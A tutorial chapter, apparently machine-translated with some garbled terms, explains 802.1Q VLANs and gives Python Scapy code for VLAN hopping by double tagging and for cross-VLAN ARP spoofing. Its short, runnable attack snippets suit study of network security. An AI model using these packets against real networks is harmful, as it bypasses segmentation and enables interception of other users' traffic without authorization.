Python Black Hat programming 3.4
A Virtual Local Area Network (VLAN) is a Virtual Network built based on the Ethernet interaction technology. It can divide a physical Network into multiple valns or overcome physical Network barriers, users in different subnets are allocated to the same VLAN. Figure 2 shows an example of VLAN division.
Figure 2
There are many ways to implement VLANs. VLAN division based on swap devices is generally divided into two types:
L vswitch-based port Division
L extended Ethernet frame format based on IEEE 802.1q Protocol
Based on the L2 VLAN technology, there is a concept of Trunking. Trunking is used to connect different switches, to ensure that members of the same VLAN established across multiple switches can communicate with each other. The port used for interconnection between vswitches is called the Trunk port. In addition to 80.2.1q, Cisco has its own Trunk protocol called ISL.
Figure 3
Figure 3 is a 802.1q packet, which is essentially different from a common Ethernet frame, but adds a VLAN Tag. The red VLAN Identifier identifies the VLAN to which a data packet belongs, so that the range of data broadcast does not span the VLAN.
Now let's take a simple look. If we want to communicate across VLANs, do we only need to modify the identifiers in the packets?
3.4.1 VLAN Hopping
Based on the above analysis, we consider a simple scenario: Send a ping request from a host in Vlan1 to a host in vlan2.
Before coding, we still need to solve the problem of VLAN packet construction. In Scapy, we use the Dot1Q class to construct the Tag section in figure 3. 4.
Figure 4
Now we can write a cross-VLAN ping request.
#!/usr/bin/python from scapy.all import * packet = Ether(dst="c0:d3:de:ad:be:ef") / \Dot1Q(vlan=1) / \Dot1Q(vlan=2) / \IP(dst="192.168.13.3") / \ICMP() sendp(packet)
The above Code specifies the MAC address and IP address of the target host, and adds two VLAN IDs. The first is the VLAN of the host that sends data, and the second is the VLAN of the target host. The switch removes the first identifier and forwards the packet to the target host when reading the second identifier.
3.4.2 cross-vlan arp Spoofing
We are discussing ARP spoofing in sections 3.1, 3.2, and 3.3. Because VLAN limits broadcast domains, our previous Code cannot perform ARP spoofing across VLANs. To solve this problem, we only need to insert VLAN IDs in the previously constructed ARP spoofing data. The following code constructs an ARP request packet in section 3.1.
def build_req():if options.target is None:pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])elif options.target:target_mac = getmacbyip(options.target)if target_mac is None:print "[-] Error: Could not resolve targets MAC address"sys.exit(1)pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)return pkt
In the packet construction section, we insert the vlan id:
pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
In this way, cross-vlan arp spoofing can be achieved.
3.4.3 Summary
This section describes how to construct packets that deceive VLANs to achieve cross-VLAN data communication and ARP spoofing. It should be noted that the methods in this article mainly aim at the 802.1Q protocol, and there is no effect on VLAN physically isolated by port.
The above is a detailed explanation of Python Black Hat programming 3.4 spanning VLAN. I hope it will help you. If you have any questions, please leave a message and I will reply to you in a timely manner. Thank you very much for your support for the help House website!